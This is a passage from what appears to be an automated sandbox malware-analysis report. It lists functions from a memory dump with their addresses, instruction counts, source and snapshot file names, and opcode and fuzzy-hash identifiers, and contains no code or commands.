                                        • Opcode Fuzzy Hash: b84974c02a527b4e0ec5f38a7617ed7be1a60ef1e3ba162ef5975c82217e12c3
                                        • Instruction Fuzzy Hash: 3A11C8366441459FD711CF58D401BA6FBB9FB96318F09815AE848CF325D731EC81CBA1
                                        Function 0145C810 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab0abff5b250b48c3e147f2fdc8fd323a2a49d2b47fc5cb9e8592cac0a074195
                                        • Instruction ID: 3538bcb386ae7697146d8f56e8e48159bcdb409153f5696c7d9c3d3a4930ff79
                                        • Opcode Fuzzy Hash: ab0abff5b250b48c3e147f2fdc8fd323a2a49d2b47fc5cb9e8592cac0a074195
                                        • Instruction Fuzzy Hash: AF1118B1A002099FCB00DFAAD581AAEBBF8FF58350F14406AA905E7355D674EA018BA4
                                        Function 0147EA60 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe1f1f1c5f5d3b8d6f52ea97c71fdee7aa08ec3461761eccf3c5c256e134a3a3
                                        • Instruction ID: f6e34090daf4565a22d3c68e711a1085e70cfad5b1fd23637168bd359b97c2ea
                                        • Opcode Fuzzy Hash: fe1f1f1c5f5d3b8d6f52ea97c71fdee7aa08ec3461761eccf3c5c256e134a3a3
                                        • Instruction Fuzzy Hash: 5A01F1350403219FCB32BE1984089A7BBE9FF91654B0584AFE2012B3B0CB70DC42CB90
                                        Function 013CC020 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                        • Instruction ID: e713df66df1d93dcba0c329a57566f4d897bd64aa833ce86c0cef49b8caca260
                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                        • Instruction Fuzzy Hash: 0A012832100B559FEB22E6AAC800FA777EDFFD5614F45481EE6468BA50DAB0E882C750
                                        Function 014120F0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b91becaa39d8666b521bb9308ccd9749aca168a42d8865c31eb6a42ca3a4cdf3
                                        • Instruction ID: e4cc45e5c540341c401533dab0560265b300f8f194983745c4c45718cca16fe3
                                        • Opcode Fuzzy Hash: b91becaa39d8666b521bb9308ccd9749aca168a42d8865c31eb6a42ca3a4cdf3
                                        • Instruction Fuzzy Hash: 6E116D75A0024DAFDB15DF64C951EAF7BB9EB54340F10405AED029B2A4D735AE11CB90
                                        Function 0140E5CF Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 998b04df8ed02ecbc36cdd2728d306937cc075c16a0dc0fed77693e8c63b6291
                                        • Instruction ID: 96674029e2ca8294d9020ac650246adf8b6d0819181d7872091de3645d6cc0c2
                                        • Opcode Fuzzy Hash: 998b04df8ed02ecbc36cdd2728d306937cc075c16a0dc0fed77693e8c63b6291
                                        • Instruction Fuzzy Hash: CF01A771201711BFD711AB7ECD44E57B7ECFF98658701052AB105936A1DB74EC11CAE0
                                        Function 014669C0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e56aba63e83b7cbf770ff7015da3838ae18d0bae1ab16d009575b619b9ebf3e9
                                        • Instruction ID: 92f64a4cd9df306afc908b09ca8985f152c292577f721ab02f5a7a418d8ec504
                                        • Opcode Fuzzy Hash: e56aba63e83b7cbf770ff7015da3838ae18d0bae1ab16d009575b619b9ebf3e9
                                        • Instruction Fuzzy Hash: 190128322142029BC320DF6AD84896BFBACEB55664F12412AE958872A0E7309901C7D2
                                        Function 0145C460 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a765d1c29204f5ac0821ec72ea819988a52c3356956d35c2993594fb6ca38945
                                        • Instruction ID: b6ad5d996d51f9668b5c6f473c7da04229fdbcf474df57478954b6f7c78d4566
                                        • Opcode Fuzzy Hash: a765d1c29204f5ac0821ec72ea819988a52c3356956d35c2993594fb6ca38945
                                        • Instruction Fuzzy Hash: BD115B75A0024DABDF15EF69C884EAE7BBAEB59344F00406AFD01973A1DA35E911CB90
                                        Function 0145C97C Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52dce3c67908acc022e07c990962f3628c9da4a94898690e6b24a315397e8e39
                                        • Instruction ID: 45c5cce2ca0fd3d7937e6ea7151dcc523051d1025b8b6e340bece840f18a6dbf
                                        • Opcode Fuzzy Hash: 52dce3c67908acc022e07c990962f3628c9da4a94898690e6b24a315397e8e39
                                        • Instruction Fuzzy Hash: 541179B16083099FC700DF69C44295BBBF8EF98310F00451FB998D73A5E630E900CB92
                                        Function 0145CA11 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31543c0f5c0ec76a0a2e5a859b36a13f426bd0940e622b0c01cb8d0994435abf
                                        • Instruction ID: 01a4ba45cd58ae7db6258975c70c30639a0b39e3017d51e56c893c4962c79c5e
                                        • Opcode Fuzzy Hash: 31543c0f5c0ec76a0a2e5a859b36a13f426bd0940e622b0c01cb8d0994435abf
                                        • Instruction Fuzzy Hash: 331179B16083089FC310DF69C441A4BBBE8FF99350F00851FB998D73A5E630E900CB92
                                        Function 013EE016 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                        • Instruction ID: d6b5bba9b88007f21bbf533e972ddc1365fa99b9360a7c2274c89a36befed12a
                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                        • Instruction Fuzzy Hash: D7017C322006A49FE322861EC948F277BDCEB48758F0904B6F905CBAE1D638DD80C621
                                        Function 013C826B Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 997bfe70885a5b8ee0eee42e63ae70a01f7ea1f912ffcb85e8751e91daeb3a0a
                                        • Instruction ID: 689d15c8961b87df7b187d392129fb6221a1b94201d851ec9f8dcf38d656f4e8
                                        • Opcode Fuzzy Hash: 997bfe70885a5b8ee0eee42e63ae70a01f7ea1f912ffcb85e8751e91daeb3a0a
                                        • Instruction Fuzzy Hash: 0401D431600509AFD714DB6AD918AAA77AAEF50A14B05406E9E01A7661EE30DE02C390
                                        Function 0147EB50 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 2e65e47e92e0b4702ba2975ec3951c64f2fe7e8d15d24c95c3d1e22fc6790d20
                                        • Instruction ID: c7dc65c1cbb898bf11eb1e085495b36e33ddb0724b3eac3c79485b659acf5e22
                                        • Opcode Fuzzy Hash: 2e65e47e92e0b4702ba2975ec3951c64f2fe7e8d15d24c95c3d1e22fc6790d20
                                        • Instruction Fuzzy Hash: E4018F75241711AFD3319E1AD940F52BAA8AF55B54F11842FB206AB3B0D6B098418B64
                                        Function 013D2582 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04b4c986fd83b0e46f2455de397754dcb07244443dfa35808dd2b16d271f3c24
                                        • Instruction ID: 912220972bca5f947c2fb2a29ac2262b8166ef68a0c77014461933d4b233b89a
                                        • Opcode Fuzzy Hash: 04b4c986fd83b0e46f2455de397754dcb07244443dfa35808dd2b16d271f3c24
                                        • Instruction Fuzzy Hash: B5F0F433641B20B7C7319B5ADC40F57BEAEEBC4AA4F104029B60697650CA30ED01CAA0
                                        Function 013FC073 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                        • Instruction ID: a92adfcddb4aa0765c06c68ebe4b7af028bfee7a90a1fc26dbc700c5f8ac6f34
                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                        • Instruction Fuzzy Hash: B5F062B2A00625ABD324CF4DDC40E67FBEADBD5A94F05812DE659D7220EA31DD05CB90
                                        Function 014A634F Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34cb25de1f5fb7cabcfa9f8d42f829fade19c564c0fbe4b78eeb8b98576e61f6
                                        • Instruction ID: 1f0059b26c092ff677d5d16640249fe6260e483115e73907e5b20dfc9476fdbd
                                        • Opcode Fuzzy Hash: 34cb25de1f5fb7cabcfa9f8d42f829fade19c564c0fbe4b78eeb8b98576e61f6
                                        • Instruction Fuzzy Hash: 17014471A1020DEFDB04DFA9D55199EB7F8FF68304F55405AF904E7360D7749A018BA0
                                        Function 013CC310 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                        • Instruction ID: 7f21e8b29a500641aceccff8b472083f4aaf4cd15ee86a77c876e88073436593
                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                        • Instruction Fuzzy Hash: 9AF021732046339BD733665D5840F6BA9998FD1E6CF19103DF20D9B644C978CD0257D0
                                        Function 014A625D Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 232bc0f748adf5d2fca40d92cf0abf3e391689a475d7565e0059b23dad4daf58
                                        • Instruction ID: da8f73988eef7a5aa64d9c9c32c8b1cdb0f01857f022ef1567eb02af4ecdd60b
                                        • Opcode Fuzzy Hash: 232bc0f748adf5d2fca40d92cf0abf3e391689a475d7565e0059b23dad4daf58
                                        • Instruction Fuzzy Hash: CD017171A00209AFCB04DFA9D5419AEB7F8EF68304F55405AF900E73A0D67499018BA0
                                        Function 014A62D6 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b53f0aad273206d3c46ea7e1e500067319cff93d52f60ce28076df6d4f69bdc
                                        • Instruction ID: 8453254eff2fd85660d32508984d6524e9d2ca763f249b9116eb5a726bbf1e85
                                        • Opcode Fuzzy Hash: 7b53f0aad273206d3c46ea7e1e500067319cff93d52f60ce28076df6d4f69bdc
                                        • Instruction Fuzzy Hash: A70144B1A0020DEFDB04DFA9D54599EBBF8FF68304F55405AF914EB3A4D6749D018BA0
                                        Function 0140CA6F Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                        • Instruction ID: 2c3f32e127b0cba1e2bc510147c77ff74dbb8eecb20636ce06c5ba1b7917d5c8
                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                        • Instruction Fuzzy Hash: 3101D631604686DBE323D6AEC849B5ABBD8EF51754F0841B7FA048B7F1E679C841C610
                                        Function 014A61E5 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0e324ab9a5a50a65f8c8857c67320c5989ab7663679639aa9dc42c173d0caf5
                                        • Instruction ID: b3592a0a7ec0c54303c24fb93b2637ee30532f875834aed08e8c65546f62b0a4
                                        • Opcode Fuzzy Hash: a0e324ab9a5a50a65f8c8857c67320c5989ab7663679639aa9dc42c173d0caf5
                                        • Instruction Fuzzy Hash: 22018F71A002499FCB00DFA9D545AEEBBF8FF58310F15005AE900A7390D734EA01CB95
                                        Function 014563C0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                        • Instruction ID: 0f784a2db95247b3706fa85c1c90f44572368891638f150fb93d1d66e500825b
                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                        • Instruction Fuzzy Hash: 76F01D7220011DBFEF019F95DD80DAF7BBEEB59698B114129FA1192160D631DD21ABA0
                                        Function 0145A4B0 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e2bd7abdf86d299ddcbaf9e04cf1c513176ef45a1d3e58d3f673d45c79b9d99
                                        • Instruction ID: 897d5fee1fcb88f9e09e5becf43ea7c8e46f5bbf4025faf92add51342c39342f
                                        • Opcode Fuzzy Hash: 5e2bd7abdf86d299ddcbaf9e04cf1c513176ef45a1d3e58d3f673d45c79b9d99
                                        • Instruction Fuzzy Hash: 67018536100209AFCF129E84D840EDE3F66FB4C768F068216FE1866221C732E971EB81
                                        Function 013CC0F0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21d83bd448c12a96cf286f5e17c809b2eba11bd4a5f8b3373705ed08c0f3097b
                                        • Instruction ID: d3025dc63632c168433ed154a41bbb9e9618b0230224dd46db5d4ebf4a819c77
                                        • Opcode Fuzzy Hash: 21d83bd448c12a96cf286f5e17c809b2eba11bd4a5f8b3373705ed08c0f3097b
                                        • Instruction Fuzzy Hash: 31F024723042419FF314961A9C41B32329AE7D0A58F69906EEB0D8B6C1E972DC01C394
                                        Function 0140656A Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e4b9aa79d9d3526365c95fa362f07c7ab7d6b49c82a8933ce13322c7bbe415f
                                        • Instruction ID: 12819eb70a778f15dff1bcc0b6c44665f1b321ca03f912e3b6eb95feb91816f7
                                        • Opcode Fuzzy Hash: 9e4b9aa79d9d3526365c95fa362f07c7ab7d6b49c82a8933ce13322c7bbe415f
                                        • Instruction Fuzzy Hash: 390181703047859FF3239B2DDD48F2A37E4BB50B44F4945A6BA029B6F6EB79D4028214
                                        Function 0147437C Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                        • Instruction ID: d68ab60c8182bd6ac174c9fc95583fa337233071e75986d5c5f51936cea8d305
                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                        • Instruction Fuzzy Hash: 5DF0E935341E1347E736BA2E8420B7FA6959FA0910B0D053F9609CB7E0DF30DC158780
                                        Function 0145E872 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                        • Instruction ID: 20b575235b51e04b0dd0f01efe4869fe59afecc70e9a7e02dff5997439abdb3d
                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                        • Instruction Fuzzy Hash: EAF05E327156229BE7619A4ECC80F17F7A8AFD5A60F190066AA05AB771C770ED028BD0
                                        Function 0145C89D Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd6d96f38f6e24ced701899b89b3000c0d02ba61e46ca92307603092560d37aa
                                        • Instruction ID: b26d4a236790eeffe112e1e7c58a449775976196fd16f2f6c4cc2adeca77cc1b
                                        • Opcode Fuzzy Hash: fd6d96f38f6e24ced701899b89b3000c0d02ba61e46ca92307603092560d37aa
                                        • Instruction Fuzzy Hash: FBF0AF706093049FC350EF29C546A1BBBE8FF98710F40465EBC98DB3A5E634E901C796
                                        Function 01400854 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                        • Instruction ID: 5246cadd91cfb0c7cb912de41d4fe47c67d1caccf355a37ed3a39d868ceb0a67
                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                        • Instruction Fuzzy Hash: 36F02472600200AFE315DB26CC04F96B6E9FF99344F148078A544D72B0FAB4DE01C754
                                        Function 0145C912 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 202bf7e925eef536a50bb15064cd77df434aff84f4e5c649c7091450871802aa
                                        • Instruction ID: 47d642b561bdb6ba14860df4aa0aa5334985d55226b3b75e3638de05591394b0
                                        • Opcode Fuzzy Hash: 202bf7e925eef536a50bb15064cd77df434aff84f4e5c649c7091450871802aa
                                        • Instruction Fuzzy Hash: 26F04F70A012499FCB14EF69C555A5EBBF8EF18300F00805AA955EB3A5DA38EA01CB50
                                        Function 013D47FB Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c5a4d91aefe29f6e32e653d42002c4c53d49e53e30e24e75d46c1e223cddbbf
                                        • Instruction ID: 6bad6e98e0caf74cafc7b3939b19be6070d0f35a16ce0d024d149bb2d53779ec
                                        • Opcode Fuzzy Hash: 1c5a4d91aefe29f6e32e653d42002c4c53d49e53e30e24e75d46c1e223cddbbf
                                        • Instruction Fuzzy Hash: 3CF0F033D027E49EE722CB2CE009B22BFC89B006ACF08486AC54DC3D02D331D880C600
                                        Function 01490115 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb048b18a131cd2effb0c8a56e8332dc7421bea1afb98411ae964624c474be3
                                        • Instruction ID: 6562d632bc80b8a95517d6a65cb515b9e7128faf57fdb8c0a75d1bdfa3b9db5f
                                        • Opcode Fuzzy Hash: aeb048b18a131cd2effb0c8a56e8332dc7421bea1afb98411ae964624c474be3
                                        • Instruction Fuzzy Hash: A2F027A64166800ACFB26F2C64522D63F68A791510F0A504FD8A097339C6768883C320
                                        Function 0140C5ED Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8111cc898f0b72b986d0a71b7ed56beaf28fbc880d0adbc089c7a02de8371bd
                                        • Instruction ID: 0c6a0197aeb6195454a77225a55384ab1360f6c536967f31c76b1e0ecaf5fe0c
                                        • Opcode Fuzzy Hash: a8111cc898f0b72b986d0a71b7ed56beaf28fbc880d0adbc089c7a02de8371bd
                                        • Instruction Fuzzy Hash: A0F02E71402650DBE333875EC888B127BE49B406A4F0C9EB7D80AC32B2C270E882CA80
                                        Function 01412619 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
